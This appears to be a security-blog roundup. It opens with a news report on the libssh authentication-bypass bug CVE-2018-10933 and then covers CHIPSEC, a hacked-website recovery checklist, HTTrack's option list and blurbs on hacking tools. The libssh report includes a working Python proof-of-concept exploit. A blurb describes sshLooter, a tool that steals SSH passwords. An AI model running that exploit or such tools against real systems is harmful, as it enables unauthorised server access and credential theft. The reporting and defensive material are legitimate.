A fairly serious four-year-old libssh bug has left servers vulnerable to remote compromise. Fortunately, the attack surface isn’t that big, as neither OpenSSH nor the GitHub implementation is affected.
The bug is in the not-so-widely-used libssh library, not to be confused with libssh2 or OpenSSH, which are both very widely used.
There’s a four-year-old bug in the Secure Shell implementation known as libssh that makes it trivial for just about anyone to gain unfettered administrative control of a vulnerable server. While the authentication-bypass flaw represents a major security hole that should be patched immediately, it wasn’t immediately clear which sites or devices were vulnerable, since neither the widely used OpenSSH nor GitHub’s implementation of libssh was affected.
The vulnerability, which was introduced in libssh version 0.6 released in 2014, makes it possible to log in by presenting a server with an SSH2_MSG_USERAUTH_SUCCESS message rather than the SSH2_MSG_USERAUTH_REQUEST message the server was expecting, according to an advisory published Tuesday.
The issue stems from the fact that libssh uses the same state machine to handle authentication for both clients and servers; the message-dispatching code processes these messages with the same function and doesn’t verify which mode it’s running in. As a result, a server that receives SSH2_MSG_USERAUTH_SUCCESS – a message only a server should ever send – simply transitions into the authenticated state.
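To make that concrete, below is a minimal sketch of the bypass in Python, using paramiko to speak the SSH wire protocol. The target host is hypothetical, a vulnerable libssh (0.6 through 0.8.3) running in server mode is assumed, and paramiko’s private _send_message() is used purely for illustration:

import socket
import paramiko

HOST, PORT = "192.0.2.10", 22  # hypothetical target running a vulnerable libssh server

sock = socket.socket()
sock.connect((HOST, PORT))

transport = paramiko.Transport(sock)
transport.start_client()  # complete the key exchange, but do not authenticate

# Skip SSH2_MSG_USERAUTH_REQUEST entirely and instead tell the server
# that authentication has already succeeded:
msg = paramiko.message.Message()
msg.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(msg)

# A vulnerable server now treats the connection as authenticated,
# so opening a session channel should simply succeed:
session = transport.open_session()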
This libssh bug is a case of clever exploration and an understanding of how a protocol works, rather than fuzzing or brute-forcing, turning up a pretty serious vulnerability.
On the brighter side, there were no immediate signs of any big-name sites being bitten by the bug, which is indexed as CVE-2018-10933. While GitHub uses libssh, site officials said on Twitter that “GitHub.com and GitHub Enterprise are unaffected by CVE-2018-10933 due to how we use the library.” In a follow-up tweet, GitHub security officials said they use a customized version of libssh that implements an authentication mechanism separate from the one provided by the library. Out of an abundance of caution, GitHub has installed a patch released with Tuesday’s advisory.
Another limitation: only installations of libssh running in server mode are affected, while client mode is unaffected. Peter Winter-Smith, a researcher at security firm NCC Group who discovered the bug and privately reported it to libssh developers, told Ars the vulnerability is the result of libssh using the same state machine to authenticate clients and servers. Because exploits involve behavior that’s safe in the client context but unsafe in the server context, only servers are affected.
A search on Shodan shows around 6,300 sites using libssh, though that figure isn’t exhaustive, and as the GitHub implementation demonstrates, merely using libssh doesn’t make a site vulnerable.
It’s already fixed in the latest releases – libssh 0.8.4 and 0.7.6 – so go update your servers accordingly.
Source: Ars Technica
CHIPSEC is a platform security assessment framework for firmware hacking on PCs, covering hardware, system firmware (BIOS/UEFI), and other platform components.
It includes a security test suite, tools for accessing various low-level interfaces, and forensic capabilities. It can be run on Windows, Linux, Mac OS X and the UEFI shell.
You can use CHIPSEC to find vulnerabilities in firmware, hypervisors and hardware configuration, explore low-level system assets and even detect firmware implants.
What does CHIPSEC Platform Security Assessment Framework Do?
CHIPSEC has a bunch of modules focusing on areas such as Secure Boot, System Management Mode (SMM/SMRAM), BIOS and firmware security, and BIOS write protection, each of which can be run individually, as shown in the example after the list.
Modules such as:
– SMRAM Locking
– BIOS Keyboard Buffer Sanitization
– SMRR Configuration
– BIOS Protection
– SPI Controller Locking
– BIOS Interface Locking
– Access Control for Secure Boot Keys
– Access Control for Secure Boot Variables
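Each of those checks maps to a module that the chipsec_main utility can run individually. As an illustration (the module names below exist in CHIPSEC releases, but the available set varies by platform and version, so treat this as a sketch):

# Run the full default test suite (requires root/Administrator and the CHIPSEC driver)
python chipsec_main.py

# Or run individual modules matching the checks above
python chipsec_main.py -m common.bios_wp           # BIOS write protection
python chipsec_main.py -m common.smm               # SMRAM locking
python chipsec_main.py -m common.smrr              # SMRR configuration
python chipsec_main.py -m common.spi_lock          # SPI controller locking
python chipsec_main.py -m common.bios_kbrd_buffer  # BIOS keyboard buffer sanitization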
CHIPSEC Firmware Hacking Warnings
1. CHIPSEC kernel drivers provide direct access to hardware resources to user-mode applications (for example, access to physical memory). When installed on production systems this could allow malware to access privileged hardware resources.
2. The driver is distributed as source code. In order to load it on an operating system which requires kernel drivers to be signed (for example, 64-bit versions of Microsoft Windows 7 and higher), it is necessary to enable TestSigning (or equivalent) mode and sign the driver executable with a test signature. Enabling TestSigning (or equivalent) mode turns off an important OS kernel protection and should not be done on production systems.
3. Due to the nature of its access to hardware, if any CHIPSEC module issues an incorrect access to hardware resources, the operating system can hang or panic.
You can download CHIPSEC here:
Or read more here.
The array of easily available Hacking Tools out there now is astounding, and combined with self-propagating malware, it means people often come to me when their website has been hacked and they don’t know what to do, or even where to start.
Acunetix has come out with a very useful post with a checklist of actions to take and items to prepare to help you triage and react in the event of a compromise on one of your servers or websites.
When addressing such an event, it can be helpful to have a short checklist of tasks to perform in your recovery process. Doing the right things in the right order is key to maximising your chances of a successful and complete recovery, as well as mitigating future events.
– Preparation tasks – These make NO CHANGES to your website or any related or underlying components at all.
– Action tasks – Things you need to do, with the obvious initial focus being blocking further access by any malicious actors.
Website Got Hacked Checklist
The list of steps to work through when your website gets hacked looks like this:
- PREPARE: Reaction plan
- PREPARE: Battle sheet
- ACTION: Take your system offline
- PREPARE: Clone your system to a testbed or staging server
- PREPARE: Scan your website for vulnerabilities; identify/confirm intrusion point
- ACTION: Fix the vulnerability
- ACTION: Bring the fixed version of the site back online with a clean OS/Web Server
- PREPARE: Monitor your new and improved website
- PREPARE: Make a Reaction Plan for FUTURE events.
The guide combines basic forensics, proactive prevention going forward and general best-practice good sense for dealing with a compromise.
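As a small illustration of the clone-and-identify steps – this sketch is not from the Acunetix post, and the paths are hypothetical – comparing the compromised copy against a known-good backup quickly flags planted or modified files for manual review:

import hashlib
import os

def file_hashes(root):
    # Map each file's path (relative to root) to its SHA-256 digest
    hashes = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                hashes[os.path.relpath(path, root)] = hashlib.sha256(f.read()).hexdigest()
    return hashes

good = file_hashes("/srv/backup/site")    # known-good backup (hypothetical path)
bad = file_hashes("/srv/staging/site")    # cloned copy of the compromised site (hypothetical path)

# Any path that was added, removed or altered is a candidate intrusion artefact
for rel in sorted(set(good) | set(bad)):
    if good.get(rel) != bad.get(rel):
        print("REVIEW:", rel)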
Read the full post with details here:
HTTrack is a free and easy-to-use offline browser utility which acts as a website downloader and site ripper, copying entire websites to your machine for offline viewing.
HTTrack Website Downloader & Site Ripper
HTTrack allows you to download a World Wide Web site from the Internet to a local directory, recursively building all directories and getting all the HTML, images, and other files from the server onto your computer.
HTTrack arranges the original site’s relative link-structure, which allows you to simply open a page of the “mirrored” website in your browser, and you can browse the site from link to link as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads.
HTTrack is fully configurable and has an integrated help system.
WinHTTrack is the Windows (from Windows 2000 to Windows 10 and above) release of HTTrack, and WebHTTrack the Linux/Unix/BSD release.
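A typical mirror job looks like this – the URL and output path are illustrative, and every option used is described in the reference dump below:

httrack "http://www.example.com/" -O "/tmp/example-mirror" "+*.example.com/*" -r6 -v

Here -O sets the mirror/log path, the +*.example.com/* filter keeps the crawl on the site’s own hosts, -r6 caps the mirror depth at 6 and -v logs progress to the screen.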
HTTrack Download Website For Offline Usage
It has EXTENSIVE options as below:
HTTrack version 3.03BETAo4 (compiled Jul 1 2001)
usage: ./httrack <URLs> [-option] [+<URL_FILTER>] [-<URL_FILTER>] [+<mime:MIME_FILTER>] [-<mime:MIME_FILTER>]
with options listed below: (* is the default value)
O path for mirror/logfiles+cache (-O path_mirror[,path_cache_and_logfiles]) (--path <param>)
%O top path if no path defined (-O path_mirror[,path_cache_and_logfiles])
w *mirror web sites (--mirror)
W mirror web sites, semi-automatic (asks questions) (--mirror-wizard)
g just get files (saved in the current directory) (--get-files)
i continue an interrupted mirror using the cache
Y mirror ALL links located in the first level pages (mirror links) (--mirrorlinks)
P proxy use (-P proxy:port or -P user:pass@proxy:port) (--proxy <param>)
%f *use proxy for ftp (f0 don't use) (--httpproxy-ftp[=N])
rN set the mirror depth to N (* r9999) (--depth[=N])
%eN set the external links depth to N (* %e0) (--ext-depth[=N])
mN maximum file length for a non-html file (--max-files[=N])
mN,N' for non html (N) and html (N')
MN maximum overall size that can be uploaded/scanned (--max-size[=N])
EN maximum mirror time in seconds (60=1 minute, 3600=1 hour) (--max-time[=N])
AN maximum transfer rate in bytes/seconds (1000=1kb/s max) (--max-rate[=N])
%cN maximum number of connections/seconds (*%c10)
GN pause transfer if N bytes reached, and wait until lock file is deleted (--max-pause[=N])
cN number of multiple connections (*c8) (--sockets[=N])
TN timeout, number of seconds after a non-responding link is shutdown (--timeout)
RN number of retries, in case of timeout or non-fatal errors (*R1) (--retries[=N])
JN traffic jam control, minimum transfer rate (bytes/seconds) tolerated for a link (--min-rate[=N])
HN host is abandoned if: 0=never, 1=timeout, 2=slow, 3=timeout or slow (--host-control[=N])
n get non-html files 'near' an html file (ex: an image located outside) (--near)
t test all URLs (even forbidden ones) (--test)
NN structure type (0 *original structure, 1+: see below) (--structure[=N])
or user defined structure (-N "%h%p/%n%q.%t")
LN long names (L1 *long names / L0 8-3 conversion) (--long-names[=N])
KN keep original links (e.g. http://www.adr/link) (K0 *relative link, K absolute links, K3 absolute URI links) (--keep-links[=N])
x replace external html links by error pages (--replace-external)
%x do not include any password for external password protected websites (%x0 include) (--no-passwords)
%q *include query string for local files (useless, for information purpose only) (%q0 don't include) (--include-query-string)
o *generate output html file in case of error (404..) (o0 don't generate) (--generate-errors)
X *purge old files after update (X0 keep delete) (--purge-old[=N])
bN accept cookies in cookies.txt (0=do not accept,* 1=accept) (--cookies[=N])
u check document type if unknown (cgi,asp..) (u0 don't check, * u1 check but /, u2 check always) (--check-type[=N])
j *parse Java Classes (j0 don't parse) (--parse-java[=N])
sN follow robots.txt and meta robots tags (0=never,1=sometimes,* 2=always) (--robots[=N])
%h force HTTP/1.0 requests (reduce update features, only for old servers or proxies) (--http-10)
%B tolerant requests (accept bogus responses on some servers, but not standard!) (--tolerant)
%s update hacks: various hacks to limit re-transfers when updating (identical size, bogus response..) (--updatehack)
%A assume that a type (cgi,asp..) is always linked with a mime type (-%A php3=text/html) (--assume <param>)
F user-agent field (-F "user-agent name") (--user-agent <param>)
%F footer string in Html code (-%F "Mirrored [from host %s [file %s [at %s]]]") (--footer <param>)
%l preferred language (-%l "fr, en, jp, *") (--language <param>)
Log, index, cache
C create/use a cache for updates and retries (C0 no cache,C1 cache is prioritary,* C2 test update before) (--cache[=N])
k store all files in cache (not useful if files on disk) (--store-all-in-cache)
%n do not re-download locally erased files (--do-not-recatch)
%v display on screen filenames downloaded (in realtime) (--display)
Q no log - quiet mode (--do-not-log)
q no questions - quiet mode (--quiet)
z log - extra infos (--extra-log)
Z log - debug (--debug-log)
v log on screen (--verbose)
f *log in files (--file-log)
f2 one single log file (--single-log)
I *make an index (I0 don't make) (--index)
%I make a searchable index for this mirror (* %I0 don't make) (--search-index)
pN priority mode: (* p3) (--priority[=N])
0 just scan, don't save anything (for checking links)
1 save only html files
2 save only non html files
*3 save all files
7 get html files before, then treat other files
S stay on the same directory
D *can only go down into subdirs
U can only go to upper directories
B can both go up&down into the directory structure
a *stay on the same address
d stay on the same principal domain
l stay on the same TLD (eg: .com)
e go everywhere on the web
%H debug HTTP headers in logfile (--debug-headers)
Guru options: (do NOT use)
#0 Filter test (-#0 '*.gif' 'www.bar.com/foo.gif')
#f Always flush log files
#FN Maximum number of filters
#h Version info
#K Scan stdin (debug)
#L Maximum number of links (-#L1000000)
#p Display ugly progress information
#P Catch URL
#R Old FTP routines (debug)
#T Generate transfer ops. log every minute
#u Wait time
#Z Generate transfer rate statistics every minute
#! Execute a shell command (-#! "echo hello")
Command-line specific options:
V execute system command after each file ($0 is the filename: -V "rm \$0") (--userdef-cmd <param>)
%U run the engine with another id when called as root (-%U smith) (--user <param>)
Details: Option N
N0 Site-structure (default)
N1 HTML in web/, images/other files in web/images/
N2 HTML in web/HTML, images/other in web/images
N3 HTML in web/, images/other in web/
N4 HTML in web/, images/other in web/xxx, where xxx is the file extension
(all gif will be placed onto web/gif, for example)
N5 Images/other in web/xxx and HTML in web/HTML
N99 All files in web/, with random names (gadget !)
N100 Site-structure, without www.domain.xxx/
N101 Identical to N1 except that "web" is replaced by the site's name
N102 Identical to N2 except that "web" is replaced by the site's name
N103 Identical to N3 except that "web" is replaced by the site's name
N104 Identical to N4 except that "web" is replaced by the site's name
N105 Identical to N5 except that "web" is replaced by the site's name
N199 Identical to N99 except that "web" is replaced by the site's name
N1001 Identical to N1 except that there is no "web" directory
N1002 Identical to N2 except that there is no "web" directory
N1003 Identical to N3 except that there is no "web" directory (option set for g option)
N1004 Identical to N4 except that there is no "web" directory
N1005 Identical to N5 except that there is no "web" directory
N1099 Identical to N99 except that there is no "web" directory
Details: User-defined option N
%n Name of file without file type (ex: image)
%N Name of file, including file type (ex: image.gif)
%t File type (ex: gif)
%p Path [without ending /] (ex: /someimages)
%h Host name (ex: www.someweb.com)
%M URL MD5 (128 bits, 32 ascii bytes)
%Q query string MD5 (128 bits, 32 ascii bytes)
%q small query string MD5 (16 bits, 4 ascii bytes)
%s? Short name version (ex: %sN)
%[param] param variable in query string
There is a great guide here explaining all of the options for downloading websites:
HTTrack Download Website Copier
You can download HTTrack here:
Or read more here.
sshLooter is a Python script that uses a PAM module to steal SSH passwords, logging each password and notifying the script’s admin via Telegram when a user logs in, rather than relying on strace, which is not so reliable. It also comes with an installation script, install.sh, to install all dependencies on a target […]
Intercepter-NG is a multifunctional network toolkit, including an Android app for hacking; its main purpose is to recover interesting data from the network stream and perform different kinds of MiTM attacks. This refers specifically to the Intercepter-NG Console Edition, which works on a range of systems including NT, Linux, BSD, Mac OS X, iOS and Android. The Windows […]